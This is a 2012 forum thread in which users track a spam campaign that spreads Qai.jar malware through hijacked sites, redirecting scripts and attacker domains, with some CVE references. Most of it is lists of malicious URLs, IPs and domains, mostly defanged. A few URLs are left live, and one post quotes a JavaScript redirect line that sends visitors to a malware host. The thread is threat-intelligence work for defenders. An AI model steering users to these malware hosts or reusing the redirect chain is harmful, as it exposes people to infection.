(The quickest way to register)

Check out our new Mobile App

Forum

  1. User picture
    • NotBuyingIt on Wed 21 Mar 2012
    • 09:15:45 PM UTC

    Qai.jar malware (CVE-2010-1885)

    A well-know spam expert is reporting an aggressively promoted malware exploit which uses multiple sites together. Deceptive web pages planted on dozens of sites load a set of JavaScripts which in turn attempt to load a malicious webpage. Several variations were detected yesterday and today.

    This set of scripts
    hXXp://50.57.29.172/hVg3GFAo/js.js
    hXXp://finantariauto.ro/5ZqETXNE/js.js
    hXXp://ipecturkey.com/E2UNfoGY/js.js
    hXXp://oompa.de/VTwQKwDD/js.js
    attempt to load
    hXXp://209.59.217.193/showthread.php?t=d7ad916d1c0396ff
    that leads to malware at
    hXXp://209.59.217.193/q.php?f=ba33
    hXXp://209.59.217.193/content/Qai.jar

    This set of scripts
    hXXp://216.205.49.67/CD5s3Ne3/js.js
    hXXp://activetours.pttk.pl/Eaz0Mz8g/js.js
    hXXp://copymax.gr/jbbaaFCK/js.js
    hXXp://offvip.com/TtMQy1sw/js.js
    hXXp://solocyberday.com/oDYibUuh/js.js
    attempt to load
    hXXp://slickicus.com/showthread.php?t=8d80b8c3f87a9538
    that leads to malware at
    hXXp://slickicus.com/q.php?f=db757
    hXXp://slickicus.com/content/Qai.jar

    This set of scripts
    hXXp://officefurnituremart.com/sT1SFMyf/js.js
    hXXp://orvosokafrikaert.hu/Bsz1CQg0/js.js
    hXXp://qqprints.com.my/37ErBpvj/js.js
    hXXp://romanjewelers.com/mnbCaEYY/js.js
    hXXp://samx.zzl.org/crF5iYsT/js.js
    attempt to load
    hXXp://slicksphere.com/showthread.php?t=d7ad916d1c0396ff
    but the domain slicksphere.com has been suspended

    Here are some of the deceptive URLs that have been reported earlier today

    hXXp://02f40c1.netsolhost.com/jXh3opQk/index.html
    hXXp://02f40c1.netsolhost.com/pVXky4P3/index.html
    hXXp://184.164.129.5/H0PL9q26/index.html
    hXXp://3eras.com/0X98aHUS/index.html
    hXXp://5seis.com.ar/jXh3opQk/index.html
    hXXp://91.93.110.150/JYjJE2q2/index.html
    hXXp://acriancafeliz.org.br/vyEryYcH/index.html
    hXXp://advanced-web-hosting-solutions.com/H0PL9q26/index.html
    hXXp://advancedcopier.net/tMYwdbsB/index.html
    hXXp://aerospacend.com/0X98aHUS/index.html
    hXXp://autolorentzos.gr/46iU2yx2/index.html
    hXXp://autolorentzos.gr/k4H1CSBf/index.html
    hXXp://autouniversal.ro/tMYwdbsB/index.html
    hXXp://bestdeal.com.vn/H0PL9q26/index.html
    hXXp://binhanphat.vn/pVXky4P3/index.html
    hXXp://chinchunhoo.com/tp3G2sKH/index.html
    hXXp://criadero-duancos.com.ar/jXh3opQk/index.html
    hXXp://dhtics.webou.net/8pe5eCMZ/index.html
    hXXp://dhtics.webou.net/N7hwdmet/index.html
    hXXp://dhtics.webou.net/vyEryYcH/index.html
    hXXp://fundoohairstyles.com/0X98aHUS/index.html
    hXXp://getstrength.com/pVXky4P3/index.html
    hXXp://glamourspa.com.vn/H0PL9q26/index.html
    hXXp://goksen.com.tr/H0PL9q26/index.html
    hXXp://goksen.com.tr/JYjJE2q2/index.html
    hXXp://goksen.com.tr/tp3G2sKH/index.html
    hXXp://hajashaza.hu/JYjJE2q2/index.html
    hXXp://hajashaza.hu/pVXky4P3/index.html
    hXXp://hajashaza.hu/W9x9Xomw/index.html
    hXXp://hellenic-antiaging-academy.gr/k4H1CSBf/index.html
    hXXp://hidroprojekt-consult.hr/W9x9Xomw/index.html
    hXXp://hippocrafts.com/46iU2yx2/index.html
    hXXp://hippocrafts.com/8pe5eCMZ/index.html
    hXXp://hippocrafts.com/svaVeSkm/index.html
    hXXp://hyperbeesmedia.com/svaVeSkm/index.html
    hXXp://ibafo.com.br/LTWJaNR9/index.html
    hXXp://ibafo.com.br/N7hwdmet/index.html
    hXXp://inour.biz/JYjJE2q2/index.html
    hXXp://inour.biz/pVXky4P3/index.html
    hXXp://isravilon1.com/tMYwdbsB/index.html
    hXXp://junglecreativestudio.gr/k4H1CSBf/index.html
    hXXp://jurjev.com/8pe5eCMZ/index.html
    hXXp://koala.unas.cz/N7hwdmet/index.html
    hXXp://kolling.com.my/LTWJaNR9/index.html
    hXXp://kongo.co.hu/N7hwdmet/index.html
    hXXp://kongo.co.hu/svaVeSkm/index.html
    hXXp://kongo.co.hu/tMYwdbsB/index.html
    hXXp://laflcargo.com/vyEryYcH/index.html
    hXXp://laleyurtseven.com/8pe5eCMZ/index.html
    hXXp://laleyurtseven.com/tMYwdbsB/index.html
    hXXp://ledsociety.com/7ik7M03n/index.html
    hXXp://ledsociety.com/tp3G2sKH/index.html
    hXXp://leikar.net/vyEryYcH/index.html
    hXXp://linemenu.com/8pe5eCMZ/index.html
    hXXp://linemenu.com/svaVeSkm/index.html
    hXXp://littlelordspreschool.com/0X98aHUS/index.html
    hXXp://lsquarednetworks.com/7ik7M03n/index.html
    hXXp://lsquarednetworks.com/tp3G2sKH/index.html
    hXXp://mage.ibraggiotti.com/0X98aHUS/index.html
    hXXp://mage.ibraggiotti.com/W9x9Xomw/index.html
    hXXp://magneticlodestone.com/46iU2yx2/index.html
    hXXp://magneticlodestone.com/tMYwdbsB/index.html
    hXXp://maxiesolutions.com/svaVeSkm/index.html
    hXXp://mayerdobrasil.com.br/W9x9Xomw/index.html
    hXXp://mcms.xs2theworld.com/LTWJaNR9/index.html
    hXXp://mcms.xs2theworld.com/vyEryYcH/index.html
    hXXp://metrofincaraiz.com/0X98aHUS/index.html
    hXXp://minds.com.pk/8pe5eCMZ/index.html
    hXXp://mishelart.com/tp3G2sKH/index.html
    hXXp://mixtle.com/tMYwdbsB/index.html
    hXXp://mkultura.lt/7ik7M03n/index.html
    hXXp://musicalchemylab.lh.pl/46iU2yx2/index.html
    hXXp://myghanaonline.com/N7hwdmet/index.html
    hXXp://notebooktamiri.gen.tr/vyEryYcH/index.html
    hXXp://objebi.com/xBu5dukk/index.html
    hXXp://olla-de-felix-buenos-aires.com/Qyuv8XX1/index.html
    hXXp://olla-de-felix-buenos-aires.com/xBu5dukk/index.html
    hXXp://oneblr.com/a65oSoKL/index.html
    hXXp://optimizacija-seo.com/a65oSoKL/index.html
    hXXp://overhill.comicgenesis.com/xBu5dukk/index.html
    hXXp://paperbuzz.net/3BvC2cTf/index.html
    hXXp://party-chat.hu/a65oSoKL/index.html
    hXXp://party-chat.hu/xBu5dukk/index.html
    hXXp://povilasc.ipower.com/tp3G2sKH/index.html
    hXXp://pp.premiumpage.pl/vyEryYcH/index.html
    hXXp://Privatesandbox.com/qVsVjYfe/index.html
    hXXp://prodmovie.com/xBu5dukk/index.html
    hXXp://psytrip.com.br/LTWJaNR9/index.html
    hXXp://public.smartbe.be/0X98aHUS/index.html
    hXXp://rajtr.com/7ik7M03n/index.html
    hXXp://realestatebootcamp.ca/LTWJaNR9/index.html
    hXXp://redencionsofro.com.ar/3BvC2cTf/index.html
    hXXp://revivalgospelministries.org/LTWJaNR9/index.html
    hXXp://riwex.hu/3BvC2cTf/index.html
    hXXp://sarahyong.com/CzEjfCRK/index.html
    hXXp://sereflikochisarzob.org/LTWJaNR9/index.html
    hXXp://sezam.home.pl/CzEjfCRK/index.html
    hXXp://silentstartupwebsite.com/CzEjfCRK/index.html
    hXXp://silentstartupwebsite.com/xBu5dukk/index.html
    hXXp://siranmuftulugu.gov.tr/46iU2yx2/index.html
    hXXp://sisrs.org/tMYwdbsB/index.html
    hXXp://sixdimensions.co.id/xBu5dukk/index.html
    hXXp://softwarepark-galati.ro/xBu5dukk/index.html
    hXXp://swcc.marknetdev.com/LTWJaNR9/index.html
    hXXp://sxs-bwn.org/vyEryYcH/index.html
    hXXp://techleadsolution.com/QnXBRiWS/index.html
    hXXp://tehranmaltbeer.com/30VtVqEf/index.html
    hXXp://tempo-www.defisduchott.com/CzEjfCRK/index.html
    hXXp://themainmall.com/svaVeSkm/index.html
    hXXp://transcamila.com/tMYwdbsB/index.html
    hXXp://upedagogica.edu.bo/N7hwdmet/index.html
    hXXp://www.tesan.com.tr/vyEryYcH/index.html

    Some other reported URLs return HTTP 404 ("Not Found") or their domains have been suspended, so I suspect efforts are underway to combat the malware campaign.

     Data that is stored in the cloud may become lost in the fog.

Comments:

  1. User picture
    • NotBuyingIt on Thu 22 Mar 2012
    • 01:56:24 AM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    Other people are also reporting virtually the same exploit which is also running on other sites.

    This set of scripts
    hXXp://50.57.29.172/hVg3GFAo/js.js
    hXXp://oompa.de/VTwQKwDD/js.js
    attempts to load
    hXXp://matormaster.com/showthread.php?t=d7ad916d1c0396ff
    that leads to malware at
    hXXp://matormaster.com/q.php?f=ba33e
    hXXp://matormaster.com/content/Qai.jar

    This set of scripts
    hXXp://officefurnituremart.com/sT1SFMyf/js.js
    hXXp://orvosokafrikaert.hu/Bsz1CQg0/js.js
    hXXp://romanjewelers.com/mnbCaEYY/js.js
    hXXp://samx.zzl.org/crF5iYsT/js.js
    attempts to load
    hXXp://slickcurve.com/showthread.php?t=d7ad916d1c0396ff
    that leads to malware at
    hXXp://slickcurve.com/q.php?f=ba33
    hXXp://slickcurve.com/content/Qai.jar

    Here are some of the deceptive URLs that have been reported within the past few hours

    hXXp://clubrepublique.com/LTWJaNR9/index.html
    hXXp://gfclock.com/tMYwdbsB/index.html
    hXXp://maxiesolutions.com/N7hwdmet/index.html
    hXXp://orangesoft.co.uk/xBu5dukk/index.html
    hXXp://palm-schools.com/xBu5dukk/index.html
    hXXp://paperbuzz.net/xBu5dukk/index.html
    hXXp://parfum-mester.hu/a65oSoKL/index.html
    hXXp://parfum-sziget.hu/a65oSoKL/index.html
    hXXp://party-chat.hu/3BvC2cTf/index.html
    hXXp://photo-howto.com/a65oSoKL/index.html
    hXXp://popi-indonesia.org/Qyuv8XX1/index.html
    hXXp://probatik.com/3BvC2cTf/index.html
    hXXp://psytrip.com.br/8pe5eCMZ/index.html
    hXXp://riwex.hu/30VtVqEf/index.html
    hXXp://riwex.hu/a65oSoKL/index.html
    hXXp://saturnosistemas.com/xBu5dukk/index.html
    hXXp://sezam.home.pl/a65oSoKL/index.html
    hXXp://silentstartupwebsite.com/a65oSoKL/index.html
    hXXp://sinarled.com/CzEjfCRK/index.html
    hXXp://sreesaiproperty.com/CzEjfCRK/index.html
    hXXp://szomaliaiegyesulet.hu/30VtVqEf/index.html
    hXXp://tamanbungaku.com/a65oSoKL/index.html
    hXXp://tanyaeco.co.za/30VtVqEf/index.html
    hXXp://terangkecil.com/3BvC2cTf/index.html
    hXXp://thechange180.com/a65oSoKL/index.html

     Data that is stored in the cloud may become lost in the fog.

  2. User picture
    • c۞g on Thu 22 Mar 2012
    • 03:48:55 AM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    Qai.jar - 17.07 KB
    VT 0/43
    contents:
    ua.class - 1.04 KB
    cons.class - 4.27 KB
    cr.class - 2.3 KB
    G.class - 3.35 KB
    ub.class - 15.63 KB
    uc.class - 389 Byte
    sys.class - 313 Byte
    results with 404 not found
    matormaster.com/content/Qai.jar
    matormaster.com/q.php?f=ba33e
    50.57.29.172/hVg3GFAo/js.js
    oompa.de/VTwQKwDD/js.js
    officefurnituremart.com/sT1SFMyf/js.js
    orvosokafrikaert.hu/Bsz1CQg0/js.js
    romanjewelers.com/mnbCaEYY/js.js
    samx.zzl.org/crF5iYsT/js.js
    results with: document.location='http://slickcurve.com/showthread.php?t=d7ad916d1c0396ff';

    slickcurve.com resides on IP:173.255.195.167 hXXp://173.255.195.167/showthread.php?t=d7ad916d1c0396ff results with same malware install

    50.57.29.172
    173.255.195.167

    oompa.de
    officefurnituremart.com
    orvosokafrikaert.hu
    romanjewelers.com
    samx.zzl.org
    slickcurve.com

    ∞ Opto, ergo sum _https://en.wikipedia.org/wiki/And_You_and_I

  3. User picture
    • NotBuyingIt on Thu 22 Mar 2012
    • 03:44:28 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    Spam email, transmitted via IP 82.127.14.217 (abo.wanadoo.fr), fraudulently claims to be a LinkIn notice. IP 82.127.14.217 may be blacklisted. The email contains a deceptive URL to a webpage at

    hXXp://butelii-acetilena.ro/59N0J8h1/index.html

    which attempts to load JavaScript from two sources

    hXXp://interspeedy.com.br/zjSxmkDM/js.js
    hXXp://limbongan.com/37hcGs54/js.js

    The scripts, in turn, attempt to redirect to a malicious web page at

    hXXp://bluecellular.com/showthread.php?t=977334ca118fcb8c

    that leads to malware at

    hXXp://bluecellular.com/content/Qai.jar
    hXXp://bluecellular.com/q.php?f=2e457

    The email contains two more suspicious URL which are either fakes or already have been disabled (HTTP 404):
    http://inepalhotels.com/y7id9XXo/index.html
    http://cgwood.net/U6PcaTcQ/index.html

    [Edit: more]
    Other malicious scripts that redirct to bluecellular.com are at

    hXXp://muttonheadcollective.com/XvLBzokA/js.js
    hXXp://auto-escolas.com/TfFQ7r6J/js.js
    hXXp://rgexcel.com/CPD4MoEs/js.js
    hXXp://turkwebalan.com/oUvuQ0b7/js.js
    hXXp://vita-shop.hu/dSSjc0ag/js.js
    hXXp://wilbrahamweddings.co.uk/qsTCVQXM/js.js
    hXXp://www.bestcar.ee/0AfKWVDW/js.js
    hXXp://www.unimoveis.net/jW57W6aZ/js.js

     Data that is stored in the cloud may become lost in the fog.

  4. User picture
    • NotBuyingIt on Thu 22 Mar 2012
    • 05:42:46 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    bluecellular.com has been suspended; its domain registrar has set its status to clientHold. The malware exploit is now using the newly registered browncellular.com instead.

    hXXp://174.133.92.122/MgGsg1Pp/js.js
    hXXp://myparacord.com/cxW8X8xp/js.js
    hXXp://prace.kupbilet.com/VTDeZmRF/js.js
    hXXp://smapit.com/TaTj4D3f/js.js
    hXXp://thebestguide1.com/arKwG4pE/js.js
    hXXp://www.aeceventos.com.br/zEQSTHfq/js.js
    hXXp://www.extrhema.com.br/cVspcegd/js.js
    hXXp://www.industriacaxiense.com.br/HLAeMSAd/js.js
    hXXp://www.inkontro.com/CXxLMToy/js.js
    hXXp://www.inkontro.it/9e85Bru8/js.js
    hXXp://www.teodo-tivat.com/osJYHU6u/js.js
    hXXp://mrsmakeit.com/9jrgDjED/js.js

    attempt to redirect to a malicious web page at

    hXXp://browncellular.com/showthread.php?t=d7ad916d1c0396ff

    that leads to malware at

    hXXp://browncellular.com/content/Qai.jar
    hXXp://browncellular.com/content/ap2.php?f=7245d

     Data that is stored in the cloud may become lost in the fog.

  5. User picture
    • NotBuyingIt on Thu 22 Mar 2012
    • 08:41:40 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    Deceptive URLs at

    hXXp://espacoquatro.com.br/3qZfYFbh/index.html
    hXXp://sauschamber.com/sgc1MBef/index.html

    load scripts from some of all of the following sources

    hXXp://skueez.com/jKtfRnuL/js.js
    hXXp://nhb.prosixsoftron.in/cJHrkMSb/js.js
    hXXp://boemelparty.be/vnB4GozT/js.js
    hXXp://www.alpine-turkey.com/YfTXsaR5/js.js
    hXXp://sas.hg.pl/Th5Da66c/js.js
    hXXp://www.vinhthanh.com.vn/8cACpVEr/js.js

    that attempt to redirect to a malicious web page at

    hXXp://cyancellular.com/showthread.php?t=d44175c6da768b70

    that, in turn, leads to malware at

    hXXp://cyancellular.com/content/Qai.jar
    hXXp://cyancellular.com/q.php?f=44c23

    Acknowledgement: I saw most of the URLs listed in this comment in the current malwaredomainlist.com report.

     Data that is stored in the cloud may become lost in the fog.

  6. User picture
    • NotBuyingIt on Thu 22 Mar 2012
    • 09:48:57 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    A deceptive URL at

    hXXp://www.kozmodisk.net/enzfjWNu/index.html

    loads scripts from all of the following sources

    hXXp://auto-escolas.com/TfFQ7r6J/js.js
    hXXp://muttonheadcollective.com/XvLBzokA/js.js
    hXXp://rgexcel.com/CPD4MoEs/js.js
    hXXp://turkwebalan.com/oUvuQ0b7/js.js
    hXXp://vita-shop.hu/dSSjc0ag/js.js
    hXXp://wilbrahamweddings.co.uk/qsTCVQXM/js.js
    hXXp://www.bestcar.ee/0AfKWVDW/js.js
    hXXp://www.unimoveis.net/jW57W6aZ/js.js

    that attempt to redirect to a malicious web page at

    hXXp://purplecellular.org/showthread.php?t=d7ad916d1c0396ff

    that leads to a suspicious file at

    hXXp://purplecellular.org/content/Qai.jar

     Data that is stored in the cloud may become lost in the fog.

  7. User picture
    • NotBuyingIt on Thu 22 Mar 2012
    • 10:55:51 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    Currently, many of the malware exploit's intermediary JavaScript files, including these

    hXXp://thebestguide1.com/arKwG4pE/js.js
    hXXp://www.extrhema.com.br/cVspcegd/js.js
    hXXp://mrsmakeit.com/9jrgDjED/js.js

    redirect to a malicious webpage at

    hXXp://whitecellular.org/showthread.php?t=d7ad916d1c0396ff

    which leads to the suspicious file

    hXXp://whitecellular.org/content/Qai.jar

     Data that is stored in the cloud may become lost in the fog.

  8. User picture
    • MarkGiles on Fri 23 Mar 2012
    • 04:51:49 AM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    From just the last 2 days, here is a list of 151 hijacked hosts found in spam. Each has an 8 random character string in the URL. They are sequenced by most frequent (127 hits) to least frequent (1 hit)

    List of domains/hosts:

    futurisima.com.ar
    iips.edu.in
    industriadaformatura.com.br
    grimper.awardspace.com
    gri.or.id
    escoladailha.com.br
    gardenmoveis.com.br
    odontofamily.com.br
    gerindra.or.id
    giftformom.trei.ro
    ttest.co.za
    oscardelaolla.com.co
    tubogas.com.br
    peridot.com.vn
    ogrodzeniamirko.home.pl
    whiteoak.co.za
    tatuielegante.com.br
    sillinho.bplaced.net
    andif.com.br
    damhofer.com
    planetafitnessltda.com.br
    manczyl.webd.pl
    spyder.snowpeak.com.tw
    positivacomunicacao.com.br
    newsletter.lavorosalute.it
    test1991.mebyre.com
    nafti.edu.gh
    testeaza.trei.ro
    lirahost.com.br
    twilightbefore.bplaced.net
    maxtone.nazwa.pl
    dentalimplants123.com
    seniordatinggroup.co.uk
    corporateuniversity.com.br
    mirrorfelder.cnh.at
    sbemrj.org.br
    cpm.borec.cz
    istorie.usm.md
    revistatempo.com.br
    radicalatm.com.ar
    intecone.com.br
    elisaviscontinetwork.com
    aluguechacaras.com.br
    ayvitour.com.ua
    chusto.lviv.ua
    scsuprema.com.br
    eventakustik.de
    eurowire.it
    aashirwad.com.hk
    fitratder.org
    mail2.direct.ee
    balihai1.tempsite.ws
    wp10647654.wp274.webpack.hosteurope.de
    visualdesenvolvimento.com.br
    ufmi.com.my
    rlinux.moderna.com.br
    rajniti.co.in
    videos.newmotion.at
    thebeautiq.com.au
    suitesdojo.com.br
    sospiscinaspr.com.br
    romero12.mserwis.pl
    revistalabarra.com.co
    laseresp.com.mx
    s373104026.online.de
    municipioderawson.gob.ar
    rmraguapura.com.br
    afrohealing.co.za
    smileshop.com.au
    praxedysadesivos.com.br
    hassansaeed.99k.org
    ocgcoaching.co.il
    rygy.com.br
    micmusz.webd.pl
    lulu.com.co
    izaz.com.br
    hoegie.be
    marcusxl.blink.pl
    z8mm.com.br
    gfpesquisas.com.br
    kadinmuhendisler.org
    redleafapartments.co.in
    saofranciscodocorumbau.com.br
    oguzhanguzel.av.tr
    nackageinvestmentgroup.com.au
    newsite.itsgroup.it
    barcuta.ro
    artdelivery.it
    witer.home.pl
    v1.globaltransit.net
    promocaolilicaetigor.com.br
    portal365.freehosting.com
    wproduct.99k.org
    ssttice.bplaced.net
    autoreinigung.at
    tiborita.altervista.org
    support.imatone.fr
    scarletcourier.50webs.com
    pm.weexcel.in
    personnalis.com.br
    prakash.clanteam.com
    lawsystem.com.br
    zegluga.lh.pl
    cityofsutton.org
    travian1000x.zzl.org
    quickphoto.com.br
    ftp.zimmerrestaurante.com.br
    ftp.vilasek.com
    ismailgunes.web.tr
    gastrocomplexeu.pl
    bizsizanayasaolmaz.org
    wordpressitalia.altervista.org
    vivaleboutique.com.br
    ucscad.com.br
    snowpeak.com.tw
    monochromatic.art.pl
    imobiliariacruzeirors.com.br
    wahbischool.com
    kemerburgazfutbolokulu.com
    gruppoenter.eu
    dimac.com.ar
    cbac.com
    voip.valorizaweb.com.br
    vinicolaperini.com.br
    travian250x.zzl.org
    travelodubai.co.uk
    topkids.com.br
    tony.web.id
    styling.krakow.pl
    ssios.com.pk
    snakeprotex.com.au
    siwy010.webd.pl
    shop.madamegrillet.it
    seicommat.hospedagemdesites.ws
    s391025613.onlinehome.fr
    recantopaulista.com.br
    radioresgateonline.com.br
    pzas.nazwa.pl
    proweb1.bplaced.net
    piratrilhas.com.br
    patentmall.com.my
    pasandola.nixiweb.com
    osteologia.org.ar
    nortonmini.com.ar
    metropolis.com.br
    mcms.xs2theworld.com
    mariotta.com.br
    loja.weissblumenn.com.br
    ftp.dariocandela.altervista.org
    eminenceorganics.com.my
    curicica.com.br
  9. User picture
    • NotBuyingIt on Fri 23 Mar 2012
    • 05:33:32 AM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    hXXp://www.aiopgiovani.it/FoSxV9z1/index.html

    loads scripts from all of the following sources

    hXXp://www.bestcar.ee/0AfKWVDW/js.js
    hXXp://turkwebalan.com/oUvuQ0b7/js.js
    hXXp://www.unimoveis.net/jW57W6aZ/js.js
    hXXp://uttonheadcollective.com/XvLBzokA/js.js

    which redirect to a malicious webpage at

    http://azurecellular.com/showthread.php?t=d7ad916d1c0396ff

    which leads to the suspicious file

    hXXp://azurecellular.com/content/Qai.jar

    Many of the scam sites hosting Qai.jar may be divided into two groups, based upon their creation dated.

    Creation Date: 13-mar-2012
    slickcurve.com (clientHold)
    slickicus.com (clientHold)
    slickidian.com (clientHold)
    slicksphere.com (clientHold)
    slickvard.com (IP 74.91.120.189)

    Creation Date: 22-mar-2012
    azurecellular.com (IP 209.59.217.78)
    bluecellular.com (clientHold)
    browncellular.com (IP 174.140.168.207)
    cyancellular.com (clientHold)
    purplecellular.org (CLIENT HOLD)
    whitecellular.org (CLIENT HOLD)

     Data that is stored in the cloud may become lost in the fog.

  10. User picture
    • NotBuyingIt on Fri 23 Mar 2012
    • 02:54:50 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    To the currently active sites created on 22-mar-2012, add

    indigocellular.com (IP 209.59.218.102)
    jadecellular.com (72.249.104.75)

    The people behind the exploit are able to occasionally change the JavaScript (.js) files that are being used to redirect to the *cellular destination sites. Here are some that are currently active.

    hXXp://www.amateursconwebcams.com/FtHrcmeW/js.js
    hXXp://aplicacionesfacebook.co/ogjrnZBv/js.js
    hXXp://arriach-urlaub.at/Vrdd912p/js.js
    hXXp://comprecar2-teste.tempsite.ws/2wYwJWKm/js.js
    hXXp://www.extrhema.com.br/cVspcegd/js.js
    hXXp://www.industriacaxiense.com.br/HLAeMSAd/js.js
    hXXp://mrsmakeit.com/9jrgDjED/js.js
    hXXp://myparacord.com/cxW8X8xp/js.js
    hXXp://thebestguide1.com/arKwG4pE/js.js

    [Edit: listed more URL and sites (after line breaks)]
    hXXp://174.133.92.122/MgGsg1Pp/js.js
    hXXp://www.aeceventos.com.br/zEQSTHfq/js.js
    hXXp://apollprint.com/Dg9kxxHh/js.js
    hXXp://bscert.eu/CAgADsB0/js.js
    hXXp://chroniquesradios.com/7KnKEoKm/js.js
    hXXp://www.frogeen.com/hPPP5CqE/js.js
    hXXp://www.inkontro.com/CXxLMToy/js.js
    hXXp://prace.kupbilet.com/VTDeZmRF/js.js

    Perhaps several hundred deceptive URLs are using those JavaScript files. Here are some that are currently active.

    hXXp://atoutfisc.com/aA4mQQKz/index.html
    hXXp://garrysun.com/dL5ygXC5/index.html
    hXXp://inashowmusic.ro/eT6xfdDr/index.html
    hXXp://mylearning.cz/DRoiQFJs/index.html
    hXXp://pn-makassarkota.go.id/4bVhnX2z/index.html
    hXXp://pomagaj.eu/DRoiQFJs/index.html
    hXXp://practikarl.co.za/RsaioAff/index.html
    hXXp://rainbow.smarthomepage.co.kr/AHR1800M/index.html
    hXXp://roffeaccessories.com/4bVhnX2z/index.html
    hXXp://sarpi-dz.net/DRoiQFJs/index.html
    hXXp://sjasset.com/bJDRq3sf/index.html
    hXXp://stilomolduras.com.br/RsaioAff/index.html
    hXXp://theyellowchilli.com/RsaioAff/index.html
    hXXp://www.enguzelsibel.com/5FP2YpGU/index.html

    hXXp://aslikongel.com/Xi73WgtU/index.html
    hXXp://bestorlandoautorepair.com/gkvorsrU/index.html
    hXXp://changkang.gov.tw/9Fi6Ru7X/index.html
    hXXp://nevilledesilva.info/Ar219WUt/index.html
    hXXp://trioshippingbh.com/NAaxhyEn/index.html
    hXXp://tvembutida.com.br/gkvorsrU/index.html
    hXXp://vinuwedsdiana.com/DRk5XAM2/index.html

     Data that is stored in the cloud may become lost in the fog.

  11. User picture
    • NotBuyingIt on Fri 23 Mar 2012
    • 07:24:19 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    This deceptive URL
    hxxp://bde-essec.com/aA4mQQKz/index.html
    links to webpages that use this set of scripts
    hxxp://bscert.eu/CAgADsB0/js.js
    hxxp://www.frogeen.com/hPPP5CqE/js.js
    which attempt to load
    hxxp://wildesthopper.com/showthread.php?t=73a07bcb51f4be71
    that leads to this suspicious file
    hxxp://wildesthopper.com/content/Qai.jar

    wildesthopper.com (IP 96.9.151.220)
    Domain Record created on 03-23-2012

    bronzecellular.com (IP 96.9.151.220)
    Creation Date: 22-mar-2012

    Update:
    www.aeceventos.com.br/zEQSTHfq/js.js
    now redirects to a malicious webpage at
    176.28.18.135:8080/showthread.php?t=73a07bcb51f4be71

     Data that is stored in the cloud may become lost in the fog.

  12. User picture
    • MarkGiles on Sat 24 Mar 2012
    • 10:11:05 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    Additional entries

    List of domains/hosts:

    aceite.jshayeb.com.br
    ageoflongju.kilu.de
    agg.org.gt
    akwajaro.com.pl
    artsalive.co.za
    bainclusiva.com.ar
    bestyun.sshel.com
    blazewear.assetict.com
    casa.puntolineagroup.com
    cdamilano.nohup.it
    christinelai127.zymichost.com
    coe.edu.ar
    colegioporter.edu.mx
    coloneziservice.com.br
    fujifood.co.cc
    muzikkeyfi.com.nu
    newsite.itsgroup.it
    papelariacorderosa.com.br
    personnalis.com.br
    portal365.freehosting.com
    prakash.clanteam.com
    scarletcourier.50webs.com
    sky0958.interhosting.kr
    spy.store.ro
    ssttice.bplaced.net
    support.imatone.fr
    tiborita.altervista.org
    travian1000x.zzl.org
    tvembutida.com.br
    tvminuto.com.br
    v1.globaltransit.net
    vitalspa.nazwa.pl
    webprovider.home.pl
    witer.home.pl
    wproduct.99k.org
    adorastudio.ro
    artdelivery.it
    autoreinigung.at
    barcuta.ro
    barkodsorgula.com
    biosimilari.com
    cikolatakursu.net
    colorificiovaldera.it
    compusat.com.br
    cosmodisksatis.net
    couradical.com
    cyrpainting.cl
    defisduchott.com
    drdakutch.com
    e3adl.com.br
    ersan.net
    exposegh.com
    jasontirado.com
    keramik.at
    kosovalajme.com
    ldc.ac.ug
    yuklesene.biz.uz
    zirkus.com.br
  13. User picture
    • MarkGiles on Sat 24 Mar 2012
    • 10:23:42 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    * Sample URLs
    a.releasenotice.com/t/c/1058/smarter/vz88.html
    a.suggestedconcept.com/t/c/1875/archive/gz26803.html
    about.helpfindpotential.com/t/c/167/sure/ez29941.html
    about.outcomeconsultants.com/t/c/2370/views/sz185881.html
    aceite.jshayeb.com.br/Xi73WgtU/index.html
    ageoflongju.kilu.de/aA4mQQKz/index.html
    agg.org.gt/Xi73WgtU/index.html
    akwajaro.com.pl/aA4mQQKz/index.html
    all.victorycommittee.com/t/c/797/complete/tz65450.html
    altoadige.alpinefitness.it/049vGEF4/index.html

    * And redirecting scripts
    avellanedain.com/8caDrgtq/js.js
    chroniquesradios.com/7KnKEoKm/js.js

    redirected to malware (Zeus) infection site
    66.151.244.223/showthread.php?t=73a07bcb51f4be71

    Malware analysis is at
    http://wepawet.iseclab.org/view.php?hash=1d502778a...

    Descriptions of the malware infectors
    * Adobe Libtiff Libtiff integer overflow in Adobe Reader and Acrobat CVE-2010-0188 = http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-...
    * HPC URL Help Center URL Validation Vulnerability CVE-2010-1885 = http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-...

  14. User picture
    • c۞g on Sat 24 Mar 2012
    • 10:28:34 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    http://66.151.244.223/showthread.php?t=73a07bcb51f4be71
    http://66.151.244.223/content/Qai.jar

    66.151.244.223

    ∞ Opto, ergo sum _https://en.wikipedia.org/wiki/And_You_and_I

  15. User picture
    • MarkGiles on Sat 24 Mar 2012
    • 10:53:13 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    This campaign was last seen at 2012-03-23 18:00

    There have been no matching patterns (/ 8 random characters / index.html) since that time.
    The pattern may have changed . . . . or the campaign may have stopped.

  16. User picture
    • NotBuyingIt on Sun 25 Mar 2012
    • 05:33:38 AM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    85.214.243.87:8080/showthread.php?t=d7ad916d1c0396ff
    (param name='archive'value='http://85.214.243.87:8080/content/Qai.jar')
    http://www.google.com/safebrowsing/diagnostic?site...

    These three deceptive URLs
    belocal.us/sgENCGn0/index.html
    carolacanobra.cl/BNqQuXZM/index.html
    crank2-derfilm.de/gkvorsrU/index.html
    load these previously reported scripts
    avellanedain.com/8caDrgtq/js.js
    chroniquesradios.com/7KnKEoKm/js.js
    which currently redirect to malware at
    72.14.184.90/showthread.php?t=73a07bcb51f4be71
